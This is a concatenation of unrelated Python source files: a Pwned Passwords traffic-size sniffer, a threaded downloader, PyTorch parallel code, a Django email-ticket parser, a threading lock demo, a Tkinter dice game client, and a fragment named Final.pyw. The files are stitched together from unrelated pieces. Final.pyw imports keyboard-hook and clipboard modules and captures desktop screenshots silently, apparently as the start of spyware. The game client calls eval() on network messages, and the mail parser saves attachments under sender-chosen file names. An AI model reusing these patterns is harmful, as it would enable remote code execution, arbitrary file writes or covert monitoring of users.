# trainer.py
#
#########################################################################################
# Including this to print error message if python < 3.0 is used
from __future__ import print_function
import sys
# Check for python3 and error out if not
if sys.version_info[0] < 3:
print("This program requires Python 3.x", file=sys.stderr)
sys.exit(1)
# Global imports
import argparse
import time
from multiprocessing import Process, Queue
import json
import traceback
# Local imports
from lib_query.query_process import launch_query_process
from lib_sniffer.training_sniffer import TrainingSniffer
from lib_query.hash_prefix import HashPrefix
## Parses the command line
#
# Responsible for parsing the command line.
#
# If you have any command line options that you want to add, they go here.
#
# All results are returned as a dictionary in 'program_info'
#
# If successful, returns True, returns False if value error, program exits if
# argparse catches a problem.
#
def parse_command_line(program_info):
# Keeping the title text to be generic to make re-using code easier
parser = argparse.ArgumentParser(
description= program_info['name'] +
', version: ' +
program_info['version'],
formatter_class = argparse.RawTextHelpFormatter
)
# filename to save the results to. If not specified, output to stdout
parser.add_argument(
'--filename',
'-f',
help = 'The filename to save results to. If not specified, will output to stdout',
metavar = 'FILE_NAME',
required = False,
default = program_info['filename']
)
# Start at the specified index, (vs 0), and append to a training set if it
# already exists
parser.add_argument(
'--start_prefix',
'-s',
help = 'Starts querying from the specified prefix, and will append to a training file if it already exists',
metavar = 'START_HASH_PREFIX',
required = False,
default = program_info['start_prefix']
)
# The default time chunks the sniffer should sniff for
parser.add_argument(
'--time_interval',
'-t',
help = 'The default time interval (seconds) the sniffer should run for when training on each hash prefix. Default is ' +str(program_info['time_interval']),
metavar = 'SECONDS',
required = False,
default = program_info['time_interval']
)
# The minimum number of samples to collect for each hash prefix
parser.add_argument(
'--num_samples',
'-n',
help = 'The minimum number of samples to collect for each hash previx. Default is ' +str(program_info['num_samples']),
metavar = 'MINIMUM_SAMPLES',
required = False,
default = program_info['num_samples']
)
# The interface to sniff on
parser.add_argument(
'--interface',
'-i',
help = 'The network interface to sniff on. Default will sniff on all interfaces',
metavar = 'INTERFACE_ID',
required = False,
default = program_info['interface']
)
# Parse all the args and save them
args=parser.parse_args()
program_info['filename'] = args.filename
program_info['start_prefix'] = args.start_prefix
program_info['time_interval'] = args.time_interval
program_info['num_samples'] = args.num_samples
program_info['interface'] = args.interface
return True
## Main function, starts everything off
#
def main():
# Information about this program
program_info = {
# Program and Contact Info
'name':'Pwned Passwords Padding Trainer',
'version': '1.0',
'author':'Matt Weir',
'contact':'cweir@vt.edu',
'filename': None,
'start_prefix': None,
'time_interval': 10,
'num_samples': 20,
'interface': None,
}
# Parsing the command line
if not parse_command_line(program_info):
# There was a problem with the command line so exit
print("Exiting...",file=sys.stderr)
return
print(program_info['name'],file=sys.stderr)
print("Version: " + str(program_info['version']),file=sys.stderr)
print('',file=sys.stderr)
# Spawn off the querying process
query_ptoc_queue = Queue()
query_ctop_queue = Queue()
query_process = Process(target=launch_query_process, args=("https://api.pwnedpasswords.com/range/", query_ptoc_queue, query_ctop_queue,))
query_process.daemon = True
query_process.start()
# Create the TrainingSniffer instance
sniffer = TrainingSniffer(program_info['time_interval'], program_info['num_samples'], program_info['interface'])
# Create the hash_prefix object that will specify the current prefix to
# target
# If static_prefix was specified on the command line:
if program_info['start_prefix'] != None:
initial_prefix = program_info['start_prefix']
prefix_len = len(program_info['start_prefix'])
# Otherwise, start at the default '00000'
else:
initial_prefix = '00000'
prefix_len = 5
hash_prefix = HashPrefix(initial= initial_prefix, length= prefix_len)
# If a hash prefix is not specified, create/erase the save file
# This depends of course of if a save file was specified or not
if program_info['filename'] != None:
if program_info['start_prefix'] == None:
try:
open(program_info['filename'], 'w').close()
except:
pass
# Used to specify if the queries should continue
keep_querying = True
try:
# Start querying the pwned passwords service
while (keep_querying):
# Start querying the hash prefix
query_ptoc_queue.put({'action':'query', 'prefix':hash_prefix.get_value()})
# Wait a short delay to give the query time to start
time.sleep(5)
# Start collecting statistics on the queries
results = sniffer.start_training()
# To keep the save file smaller, only save the minimum and maximum value
#minimum_size = min(results)
#maximum_size = max(results)
print()
print(hash_prefix.get_value())
print(results)
# Save to file if a file was specified
if program_info['filename'] != None:
save_results ={hash_prefix.get_value():results}
try:
save_file = open(program_info['filename'], 'a')
json.dump(save_results, save_file)
save_file.write("\n")
save_file.close()
except:
print("Error trying to write to the save file")
raise
# Increment the hash prefix
# If we are at the end of the keyspace, stop querying
if hash_prefix.increment() != 0:
keep_querying = False
except Exception as msg:
traceback.print_exc()
print ("Exception: " + str(msg))
query_ptoc_queue.put({'action':'stop'})
# Clean up and exit
query_process.join()
if program_info['filename'] != None:
save_file.close()
if __name__ == "__main__":
main()
|
request.py
|
import sys
import requests
import threading
import traceback
from lxml import etree
from photo_dl.log import log
from requests.adapters import HTTPAdapter
from photo_dl.config import headers
from photo_dl.config import timeout
from photo_dl.config import max_retries
from photo_dl.config import threads as _thread_size
signal_flag = True
def set_signal():
global signal_flag
signal_flag = False
print(signal_flag)
def request(url, html_flag=True):
session = requests.Session()
session.mount('http://', HTTPAdapter(max_retries=max_retries))
session.mount('https://', HTTPAdapter(max_retries=max_retries))
response = session.get(url=url, headers=headers, timeout=timeout)
if html_flag:
response.encoding = 'utf-8'
return etree.HTML(response.text)
return response
class RequestThread(threading.Thread):
def __init__(self, url, info=None, html_flag=True):
threading.Thread.__init__(self)
self.url = url
self.info = info
self.html_flag = html_flag
self.response = None
def run(self):
try:
self.response = request(self.url, self.html_flag)
except:
log('%s\n%s' % (self.url, traceback.format_exc()))
class MultiRequest:
def __init__(self, urls, name='', progress=True, html_flag=True, thread_size=_thread_size):
self.urls = urls
self.name = name
self.progress = progress
self.html_flag = html_flag
self.thread_size = thread_size
self.threads = []
self.count = 1
def get_generator(self):
for url in self.urls:
yield url
def put_request(self):
global signal_flag
generator = self.get_generator()
while signal_flag:
if threading.activeCount() < self.thread_size:
url = next(generator, None)
if url is None:
break
thread = RequestThread(url['url'], url.get('info'), self.html_flag)
thread.start()
self.threads.append(thread)
if self.progress:
print('\r[%d / %d] %s' % (self.count, len(self.urls), self.name), end='')
self.count += 1
def run(self):
if len(self.urls) == 0:
return []
_threads = []
try:
put_thread = threading.Thread(target=self.put_request)
put_thread.start()
put_thread.join()
for thread in self.threads:
thread.join()
_threads.append(thread)
except SystemExit:
sys.exit()
except:
log('%s\n%s' % (self.name, traceback.format_exc()))
return _threads
|
EncodingDataParallel.py
|
# -*- coding: utf-8 -*-
# @Author : DevinYang(pistonyang@gmail.com)
"""Refers to 'https://github.com/zhanghang1989/PyTorch-Encoding/blob/master/encoding/parallel.py'"""
__all__ = ['EncodingDataParallel', 'EncodingCriterionParallel']
import threading
import torch
import functools
import torch.cuda.comm as comm
from torch.nn import Module
from itertools import chain
from torch.autograd import Function
from torch.nn.parallel.parallel_apply import get_a_var, parallel_apply
from torch.nn.parallel._functions import ReduceAddCoalesced, Broadcast
from torch.nn.parallel.scatter_gather import scatter_kwargs, gather
from torch.nn.parallel.replicate import replicate
from torch.nn.parallel.data_parallel import _check_balance
from torch.cuda._utils import _get_device_index
from torch._utils import ExceptionWrapper
class EncodingParallel(Module):
def __init__(self, module, device_ids=None, output_device=None, dim=0):
super(EncodingParallel, self).__init__()
if not torch.cuda.is_available():
self.module = module
self.device_ids = []
return
if device_ids is None:
device_ids = list(range(torch.cuda.device_count()))
if output_device is None:
output_device = device_ids[0]
self.dim = dim
self.module = module
self.device_ids = list(map(lambda x: _get_device_index(x, True), device_ids))
self.output_device = _get_device_index(output_device, True)
self.src_device_obj = torch.device("cuda {}".format(self.device_ids[0]))
_check_balance(self.device_ids)
if len(self.device_ids) == 1:
self.module.cuda(device_ids[0])
def replicate(self, module, device_ids):
return replicate(module, device_ids, not torch.is_grad_enabled())
def scatter(self, inputs, kwargs, device_ids):
return scatter_kwargs(inputs, kwargs, device_ids, dim=self.dim)
class EncodingDataParallel(EncodingParallel):
"""Implements data parallelism at the module level.
This container parallelizes the application of the given module by
splitting the input across the specified devices by chunking in the
batch dimension.
In the forward pass, the module is replicated on each device,
and each replica handles a portion of the input. During the backwards pass, gradients from each replica are summed into the original module.
Note that the outputs are not gathered, please use compatible
:class:`encoding.parallel.DataParallelCriterion`.
The batch size should be larger than the number of GPUs used. It should
also be an integer multiple of the number of GPUs so that each chunk is
the same size (so that each GPU processes the same number of samples).
Args:
module: module to be parallelized
device_ids: CUDA devices (default: all devices)
Reference:
Hang Zhang, Kristin Dana, Jianping Shi, Zhongyue Zhang, Xiaogang Wang, Ambrish Tyagi,
Amit Agrawal. “Context Encoding for Semantic Segmentation.
*The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) 2018*
Example::
>>> net = encoding.nn.DataParallelModel(model, device_ids=[0, 1, 2])
>>> y = net(x)
"""
def forward(self, *inputs, **kwargs):
if not self.device_ids:
return self.module(*inputs, **kwargs)
for t in chain(self.module.parameters(), self.module.buffers()):
if t.device != self.src_device_obj:
raise RuntimeError("module must have its parameters and buffers "
"on device {} (device_ids[0]) but found one of "
"them on device: {}".format(self.src_device_obj, t.device))
inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
if len(self.device_ids) == 1:
return self.module(*inputs, **kwargs)
replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
outputs = self.parallel_apply(replicas, inputs, kwargs)
return outputs
def parallel_apply(self, replicas, inputs, kwargs):
return parallel_apply(replicas, inputs, kwargs, self.device_ids[:len(replicas)])
class EncodingCriterionParallel(EncodingParallel):
def forward(self, inputs, *targets, **kwargs):
# input should be already scatterd
# scattering the targets instead
if not self.device_ids:
return self.module(inputs, *targets, **kwargs)
targets, kwargs = self.scatter(targets, kwargs, self.device_ids)
if len(self.device_ids) == 1:
return self.module(inputs, *targets, **kwargs)
replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
outputs = self.criterion_apply(replicas, inputs, targets, kwargs)
return ReduceAddCoalesced.apply(self.device_ids[0], len(outputs), *outputs) / len(outputs)
def criterion_apply(self, replicas, inputs, targets, kwargs):
return criterion_parallel_apply(replicas, inputs, targets, kwargs, self.device_ids[:len(replicas)])
def criterion_parallel_apply(modules, inputs, targets, kwargs_tup=None, devices=None):
assert len(modules) == len(inputs)
assert len(targets) == len(inputs)
if kwargs_tup is not None:
assert len(modules) == len(kwargs_tup)
else:
kwargs_tup = ({}, ) * len(modules)
if devices is not None:
assert len(modules) == len(devices)
else:
devices = [None] * len(modules)
devices = list(map(lambda x: _get_device_index(x, True), devices))
lock = threading.Lock()
results = {}
grad_enabled = torch.is_grad_enabled()
def _worker(i, module, input, target, kwargs, device=None):
torch.set_grad_enabled(grad_enabled)
if device is None:
device = get_a_var(input).get_device()
try:
with torch.cuda.device(device):
if not isinstance(input, (list, tuple)):
input = (input, )
if not isinstance(target, (list, tuple)):
target = (target, )
output = module(*input, *target, **kwargs)
with lock:
results[i] = output
except Exception:
with lock:
results[i] = ExceptionWrapper(where="in replica {} on device {}".format(i, device))
if len(modules) > 1:
threads = [
threading.Thread(target=_worker, args=(i, module, input, target, kwargs, device))
for i, (module, input, target, kwargs, device) in enumerate(zip(modules, inputs, kwargs_tup, devices))
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
else:
_worker(0, modules[0], inputs[0], kwargs_tup[0], devices[0])
outputs = []
for i in range(len(inputs)):
output = results[i]
if isinstance(output, ExceptionWrapper):
output.reraise()
outputs.append(output)
return outputs
|
mailbox.py
|
import poplib, email, re, datetime, pytz, threading, time, os, random
from django.db import models
from django.conf import settings
from urllib.parse import quote
from models import ticket, uploaded_file
class OneEmail(models.Model):
uniqueid = models.CharField("Unique ID: ", max_length=100, null=False, blank=False, unique=True)
received = models.DateTimeField("received on", null=False, blank=False)
fromfield = models.CharField("Sender field", max_length=200, null=True, blank=True, default=None)
fromemail = models.EmailField("Sender email", max_length=100, null=True, blank=True, default=None)
subject = models.CharField("Subject", max_length=150, null=True, blank=True, default=None)
body = models.TextField("Body", null=True, blank=True, default=None)
def __init__(self, *args, **kwargs):
return super().__init__(*args, **kwargs)
def create(uniqueid, received, fromfield, subject, body):
match = re.search(r'<([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)>$', fromfield)
if match is None:
fromemail = None
else:
fromemail = match.group(1)
try:
obj = OneEmail.objects.create(uniqueid=uniqueid, received=received,
fromfield=fromfield, fromemail=fromemail, subject=subject, body=body)
except Exception as e:
print(e)
return None
return obj
def parseEmail(self):
if self.fromemail == settings.HELP_REQUEST_EMAIL:
organization="None"
name="None"
email=settings.INBOUND_USERNAME
subject="None"
body="None"
regex = re.compile(settings.HELP_REQUEST_REGEX_FROM)
m = regex.search(self.body)
if m is None:
return False
email_address = m.group('email')
phone_number = m.group('phone')
name = m.group('username')
if m is None:
return False
regex = re.compile(settings.HELP_REQUEST_REGEX_SUBJECT_BODY)
m = regex.search(self.body)
if m is None:
return False
subject = re.sub('=20$', '', m.group('subject').replace('=\n', ''))
body = re.sub('=20$', '', m.group('body').replace('=\n', '').replace('=20\n', '\n'))
regex = re.compile(settings.HELP_REQUEST_REGEX_ORGANIZATION)
m = regex.search(self.body)
organization = m.group('organization')
try:
subm_ticket = ticket.Ticket.objects.create(companyname=organization, contactname=name, contactphone=phone_number, contactemail=email_address,
title=subject, description=body, senderipaddress="127.0.0.1")
subm_ticket.sendemail()
except Exception as e:
print(e)
return subm_ticket
return False
class EmailServer:
def __init__(self, emailadr=None, password=None):
if emailadr is None:
emailadr = settings.INBOUND_USERNAME
if password is None:
password = settings.INBOUND_PASSWORD
self.email = emailadr
self.password = password
self.enabled = True
return None
def conMail(self):
self.mailbox = poplib.POP3_SSL(settings.INBOUND_SERVER, settings.INBOUND_PORT)
self.mailbox.user(self.email)
self.mailbox.pass_(self.password)
def closeMail(self):
self.mailbox.quit()
def readEmail(self, number):
raw_email = b"\n".join(self.mailbox.retr(number)[1])
parsed_email = email.message_from_bytes(raw_email)
if parsed_email.is_multipart():
body=""
for b in [k.get_payload() for k in parsed_email.walk() if k.get_content_type() == 'text/plain']:
body=b
break
else:
body = parsed_email.get_payload()
keys = parsed_email.keys()
if 'Subject' in keys:
subject = parsed_email['Subject']
else:
subject = ''
if 'From' in keys:
fromfield = parsed_email['From']
else:
fromfield = ''
emailid = parsed_email['message-id']
regex=re.compile(' (?P<day>\d )')
datestr=re.sub(regex, ' 0\g<day>', parsed_email['Date'])
regex=re.compile(' \(\w*\)')
datestr=re.sub(regex, '', datestr)
try:
emaildate=datetime.datetime.strptime(datestr, '%a, %d %b %Y %H:%M:%S %z')
except Exception as e:
try:
emaildate=datetime.datetime.strptime(datestr, '%d %b %Y %H:%M:%S %z')
except Exception as ex:
print(ex)
result = OneEmail.create(emailid, emaildate, fromfield, subject, body)
return result, emaildate, parsed_email
def readAllLastEmails(self):
self.conMail()
try:
listofemails = self.mailbox.list()
numberofemails = len(listofemails[1])
try:
latestemail = OneEmail.objects.all().order_by('-received')[0].received
except:
latestemail = datetime.datetime.now(pytz.utc) - datetime.timedelta(days=7)
count_new_emails = 0
for i in range(numberofemails, 0, -1):
message, emaildate, parsed_email = self.readEmail(i)
if emaildate < latestemail:
break
if (not message is None) and message:
tick = message.parseEmail()
if tick:
parse_attachments(tick, parsed_email)
count_new_emails += 1
finally:
self.closeMail()
return count_new_emails
ContinueCheckingEmail = True
def parse_attachments(tick, parsedemail):
for part in parsedemail.walk():
if not part['Content-Description'] is None:
path = tick.get_files_folder()
addition = ""
filepath = os.path.join(path, addition, part['Content-Description'])
while os.path.exists(filepath):
addition+=str(random.randint(0,9))
filepath = os.path.join(path, addition, part['Content-Description'])
newFile = open(filepath, "wb")
newFile.write(part.get_payload(decode=True))
newFile.close()
upf = uploaded_file.UploadedFileTicket(for_ticket=tick, uplfile=filepath, filename=quote(os.path.basename(filepath)))
upf.save()
def checkEmail(timeout_secs, emailsrvr):
while(emailsrvr.enabled):
emailsrvr.readAllLastEmails()
time.sleep(timeout_secs)
def initiateEmailCheck(interval_minutes=10):
if settings.ENABLE_MAIL_CHECK:
emailsrvr = EmailServer()
thread = threading.Thread(target=checkEmail, kwargs={"timeout_secs": interval_minutes*60, 'emailsrvr': emailsrvr})
thread.emailsrvr = emailsrvr
thread.start()
return thread
else:
return False
|
lock_ex.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# lock_ex.py
#
# An example of using a lock to synchronize access to shared data
import threading
X = 0 # A shared Value
COUNT = 1000000
# Primarily used to synchronize threads so that only one thread can make modifications to shared data at any given time.
X_Lock = threading.Lock() # A lock for synchronizing access to X, Race condition 竞争条件
def addition():
global X
for i in range(COUNT):
X_Lock.acquire() # Acquire the lock
# Example critical section
try:
X += 1 # Critical Section
finally:
X_Lock.release() # Release the lock
def subtraction():
global X
for i in range(COUNT):
X_Lock.acquire()
try:
X -= 1
finally:
X_Lock.release()
t1 = threading.Thread(target=subtraction)
t2 = threading.Thread(target=addition)
t1.start()
t2.start()
t1.join()
t2.join()
print(X)
"""
Only one thread can successfully acquire the lock at any given time
If another thread tries to acquire the lock when its already in use. it gets blocked until the lock is released.
Threads and locks are little more than a formalization of what the underlying hardware actually does.That's both their great strength and their great weakness.
But all is not rosy,但是一切不都乐观
"""
|
client.py
|
#-------------Boilerplate Code Start-----
import socket
from tkinter import *
from threading import Thread
import random
from PIL import ImageTk, Image
screen_width = None
screen_height = None
SERVER = None
PORT = None
IP_ADDRESS = None
playerName = None
canvas1 = None
canvas2 = None
nameEntry = None
nameWindow = None
gameWindow = None
leftBoxes = []
rightBoxes = []
finishingBox = None
playerType = None
playerTurn = None
player1Name = 'joining'
player2Name = 'joining'
player1Label = None
player2Label = None
player1Score = 0
player2Score = 0
player2ScoreLabel = None
player2ScoreLabel = None
dice = None
rollButton = None
resetButton = None
winingMessage = None
winingFunctionCall = 0
#-------------Boilerplate Code End-----
# Boilerplate Code
def checkColorPosition(boxes, color):
for box in boxes:
boxColor = box.cget("bg")
if(boxColor == color):
return boxes.index(box)
return False
# Teacher Activity
def movePlayer1(steps):
global leftBoxes
boxPosition = checkColorPosition(leftBoxes[1:],"red")
if(boxPosition):
diceValue = steps
coloredBoxIndex = boxPosition
totalSteps = 10
remainingSteps = totalSteps - coloredBoxIndex
if(steps == remainingSteps):
for box in leftBoxes[1:]:
box.configure(bg='white')
global finishingBox
finishingBox.configure(bg='red')
global SERVER
global playerName
greetMessage = f'Red wins the game.'
SERVER.send(greetMessage.encode())
elif(steps < remainingSteps):
for box in leftBoxes[1:]:
box.configure(bg='white')
nextStep = (coloredBoxIndex + 1 ) + diceValue
leftBoxes[nextStep].configure(bg='red')
else:
print("Move False")
else:
# first step
leftBoxes[steps].configure(bg='red')
# Student Activity
def movePlayer2(steps):
global rightBoxes
# Moving to reverse order
tempBoxes = rightBoxes[-2::-1]
boxPosition = checkColorPosition(tempBoxes,"yellow")
if(boxPosition):
diceValue = steps
coloredBoxIndex = boxPosition
totalSteps = 10
remainingSteps = totalSteps - coloredBoxIndex
if(diceValue == remainingSteps):
for box in rightBoxes[-2::-1]:
box.configure(bg='white')
global finishingBox
finishingBox.configure(bg='yellow', fg="black")
global SERVER
global playerName
greetMessage = f'Yellow wins the game.'
SERVER.send(greetMessage.encode())
elif(diceValue < remainingSteps):
for box in rightBoxes[-2::-1]:
box.configure(bg='white')
nextStep = (coloredBoxIndex + 1 ) + diceValue
rightBoxes[::-1][nextStep].configure(bg='yellow')
else:
print("Move False")
else:
# first step
rightBoxes[len(rightBoxes) - (steps+1)].configure(bg='yellow')
def rollDice():
global SERVER
#create a number variable in which the list of all the ASCII characters of the string will be stored
#Use backslash because unicode must have a backslash
diceChoices=['\u2680','\u2681','\u2682','\u2683','\u2684','\u2685']
#configure the label
value = random.choice(diceChoices)
global playerType
global rollButton
global playerTurn
rollButton.destroy()
playerTurn = False
if(playerType == 'player1'):
SERVER.send(f'{value}player2Turn'.encode())
if(playerType == 'player2'):
SERVER.send(f'{value}player1Turn'.encode())
def leftBoard():
global gameWindow
global leftBoxes
global screen_height
xPos = 30
for box in range(0,11):
if(box == 0):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="red")
boxLabel.place(x=xPos, y=screen_height/2 - 88)
leftBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2- 100)
leftBoxes.append(boxLabel)
xPos +=75
def rightBoard():
global gameWindow
global rightBoxes
global screen_height
xPos = 988
for box in range(0,11):
if(box == 10):
boxLabel = Label(gameWindow, font=("Helvetica",30), width=2, height=1, relief='ridge', borderwidth=0, bg="yellow")
boxLabel.place(x=xPos, y=screen_height/2-88)
rightBoxes.append(boxLabel)
xPos +=50
else:
boxLabel = Label(gameWindow, font=("Helvetica",55), width=2, height=1, relief='ridge', borderwidth=0, bg="white")
boxLabel.place(x=xPos, y=screen_height/2 - 100)
rightBoxes.append(boxLabel)
xPos +=75
def finishingBox():
global gameWindow
global finishingBox
global screen_width
global screen_height
finishingBox = Label(gameWindow, text="Home", font=("Chalkboard SE", 32), width=8, height=4, borderwidth=0, bg="green", fg="white")
finishingBox.place(x=screen_width/2 - 60, y=screen_height/2 -160)
def gameWindow():
global gameWindow
global canvas2
global screen_width
global screen_height
global dice
global winingMessage
global resetButton
gameWindow = Tk()
gameWindow.title("Ludo Ladder")
gameWindow.attributes('-fullscreen',True)
screen_width = gameWindow.winfo_screenwidth()
screen_height = gameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas2 = Canvas( gameWindow, width = 500,height = 500)
canvas2.pack(fill = "both", expand = True)
# Display image
canvas2.create_image( 0, 0, image = bg, anchor = "nw")
# Add Text
canvas2.create_text( screen_width/2, screen_height/5, text = "Ludo Ladder", font=("Chalkboard SE",100), fill="white")
# ------------ Boilerplate Code
# Declaring Wining Message
winingMessage = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 250, text = "", font=("Chalkboard SE",100), fill='#fff176')
# Creating Reset Button
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
# ------------ Boilerplate End
leftBoard()
rightBoard()
finishingBox()
global rollButton
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
global playerTurn
global playerType
global playerName
# Additional Activity
global player1Name
global player2Name
global player1Label
global player2Label
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if(playerType == 'player1' and playerTurn):
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
else:
rollButton.pack_forget()
# Creating Dice with value 1
dice = canvas2.create_text(screen_width/2 + 10, screen_height/2 + 100, text = "\u2680", font=("Chalkboard SE",250), fill="white")
# Creating name board
player1Label = canvas2.create_text(400, screen_height/2 + 100, text = player1Name, font=("Chalkboard SE",80), fill='#fff176' )
player2Label = canvas2.create_text(screen_width - 300, screen_height/2 + 100, text = player2Name, font=("Chalkboard SE",80), fill='#fff176' )
# Creating Score Board
player1ScoreLabel = canvas2.create_text(400, screen_height/2 - 160, text = player1Score, font=("Chalkboard SE",80), fill='#fff176' )
player2ScoreLabel = canvas2.create_text(screen_width - 300, screen_height/2 - 160, text = player2Score, font=("Chalkboard SE",80), fill='#fff176' )
gameWindow.resizable(True, True)
gameWindow.mainloop()
def saveName():
global SERVER
global playerName
global nameWindow
global nameEntry
playerName = nameEntry.get()
nameEntry.delete(0, END)
nameWindow.destroy()
SERVER.send(playerName.encode())
gameWindow()
def askPlayerName():
global playerName
global nameEntry
global nameWindow
global canvas1
nameWindow = Tk()
nameWindow.title("Ludo Ladder")
nameWindow.attributes('-fullscreen',True)
screen_width = nameWindow.winfo_screenwidth()
screen_height = nameWindow.winfo_screenheight()
bg = ImageTk.PhotoImage(file = "./assets/background.png")
canvas1 = Canvas( nameWindow, width = 500,height = 500)
canvas1.pack(fill = "both", expand = True)
# Display image
canvas1.create_image( 0, 0, image = bg, anchor = "nw")
canvas1.create_text( screen_width/2, screen_height/5, text = "Enter Name", font=("Chalkboard SE",100), fill="white")
nameEntry = Entry(nameWindow, width=15, justify='center', font=('Chalkboard SE', 50), bd=5, bg='white')
nameEntry.place(x = screen_width/2 - 220, y=screen_height/4 + 100)
button = Button(nameWindow, text="Save", font=("Chalkboard SE", 30),width=15, command=saveName, height=2, bg="#80deea", bd=3)
button.place(x = screen_width/2 - 130, y=screen_height/2 - 30)
nameWindow.resizable(True, True)
nameWindow.mainloop()
#--------- Boilerplate Code Start---------------
def restGame():
global SERVER
SERVER.send("reset game".encode())
def handleWin(message):
global playerType
global rollButton
global canvas2
global winingMessage
global screen_width
global screen_height
global resetButton
if('Red' in message):
if(playerType == 'player2'):
rollButton.destroy()
if('Yellow' in message):
if(playerType == 'player1'):
rollButton.destroy()
message = message.split(".")[0] + "."
canvas2.itemconfigure(winingMessage, text = message)
resetButton.place(x = screen_width / 2 - 80, y = screen_height - 220)
def updateScore(message):
global canvas2
global player1Score
global player2Score
global player1ScoreLabel
global player2ScoreLabel
if('Red' in message):
player1Score +=1
if('Yellow' in message):
player2Score +=1
canvas2.itemconfigure(player1ScoreLabel, text = player1Score)
canvas2.itemconfigure(player2ScoreLabel, text = player2Score)
def handleResetGame():
global canvas2
global playerType
global gameWindow
global rollButton
global dice
global screen_width
global screen_height
global playerTurn
global rightBoxes
global leftBoxes
global finishingBox
global resetButton
global winingMessage
global winingFunctionCall
canvas2.itemconfigure(dice, text='\u2680')
# Handling Reset Game
if(playerType == 'player1'):
# Creating roll dice button
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
playerTurn = True
if(playerType == 'player2'):
playerTurn = False
for rBox in rightBoxes[-2::-1]:
rBox.configure(bg='white')
for lBox in leftBoxes[1:]:
lBox.configure(bg='white')
finishingBox.configure(bg='green')
canvas2.itemconfigure(winingMessage, text="")
resetButton.destroy()
# Again Recreating Reset Button for next game
resetButton = Button(gameWindow,text="Reset Game", fg='black', font=("Chalkboard SE", 15), bg="grey",command=restGame, width=20, height=5)
winingFunctionCall = 0
#----------------- Boilerplate Code End ---------------
def recivedMsg():
global SERVER
global playerType
global playerTurn
global rollButton
global screen_width
global screen_height
global canvas2
global dice
global gameWindow
global player1Name
global player2Name
global player1Label
global player2Label
global winingFunctionCall
while True:
message = SERVER.recv(2048).decode()
if('player_type' in message):
recvMsg = eval(message)
playerType = recvMsg['player_type']
playerTurn = recvMsg['turn']
elif('player_names' in message):
players = eval(message)
players = players["player_names"]
for p in players:
if(p["type"] == 'player1'):
player1Name = p['name']
if(p['type'] == 'player2'):
player2Name = p['name']
elif('⚀' in message):
# Dice with value 1
canvas2.itemconfigure(dice, text='\u2680')
elif('⚁' in message):
# Dice with value 2
canvas2.itemconfigure(dice, text='\u2681')
elif('⚂' in message):
# Dice with value 3
canvas2.itemconfigure(dice, text='\u2682')
elif('⚃' in message):
# Dice with value 4
canvas2.itemconfigure(dice, text='\u2683')
elif('⚄' in message):
# Dice with value 5
canvas2.itemconfigure(dice, text='\u2684')
elif('⚅' in message):
# Dice with value 6
canvas2.itemconfigure(dice, text='\u2685')
#--------- Boilerplate Code Start--------
elif('wins the game.' in message and winingFunctionCall == 0):
winingFunctionCall +=1
handleWin(message)
# Addition Activity
updateScore(message)
elif(message == 'reset game'):
handleResetGame()
#--------- Boilerplate Code End--------
#creating rollbutton
if('player1Turn' in message and playerType == 'player1'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 250)
elif('player2Turn' in message and playerType == 'player2'):
playerTurn = True
rollButton = Button(gameWindow,text="Roll Dice", fg='black', font=("Chalkboard SE", 15), bg="grey",command=rollDice, width=20, height=5)
rollButton.place(x=screen_width / 2 - 80, y=screen_height/2 + 260)
# Deciding player turn
if('player1Turn' in message or 'player2Turn' in message):
diceChoices=['⚀','⚁','⚂','⚃','⚄','⚅']
diceValue = diceChoices.index(message[0]) + 1
if('player2Turn' in message):
movePlayer1(diceValue)
if('player1Turn' in message):
movePlayer2(diceValue)
# Additional Activity
# Creating Name Board
if(player1Name != 'joining' and canvas2):
canvas2.itemconfigure(player1Label, text=player1Name)
if(player2Name != 'joining' and canvas2):
canvas2.itemconfigure(player2Label, text=player2Name)
def setup():
global SERVER
global PORT
global IP_ADDRESS
PORT = 8000
IP_ADDRESS = '127.0.0.1'
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.connect((IP_ADDRESS, PORT))
thread = Thread(target=recivedMsg)
thread.start()
askPlayerName()
setup()
|
Final.pyw
|
import multiprocessing
import os
import sys
import time
import pythoncom
import pyHook
import win32con
import win32clipboard
import win32gui
import win32ui
import wmi
def take_screenshot():
# Gather the desktop information
desktop=win32gui.GetDesktopWindow()
left, top, right, bottom=win32gui.GetWindowRect(desktop)
height=bottom - top
width=right - left
# Prepare objects for screenshot
win_dc = win32gui.GetWindowDC(desktop)
ui_dc=win32ui.CreateDCFromHandle(win_dc)
# Create screenshot file
bitmap = win32ui.CreateBitmap()
bitmap.CreateCompatibleBitmap(ui_dc, width, height)
compat_dc=ui_dc.CreateCompatibleDC()
compat_dc.SelectObject(bitmap)
#Capture screenshot
compat_dc.BitBlt((0,0),(width, height) , ui_dc, (0,0), win32con.SRCCOPY)
bitmap.Paint(compat_dc)
timestr = time.strftime("_%Y%m%d_%H%M%S")
bitmap.SaveBitmapFile(compat_dc,'screenshot'+timestr+'.bmp')
# Release objects to prevent memory issues
ui_dc.DeleteDC()
compat_dc.DeleteDC()
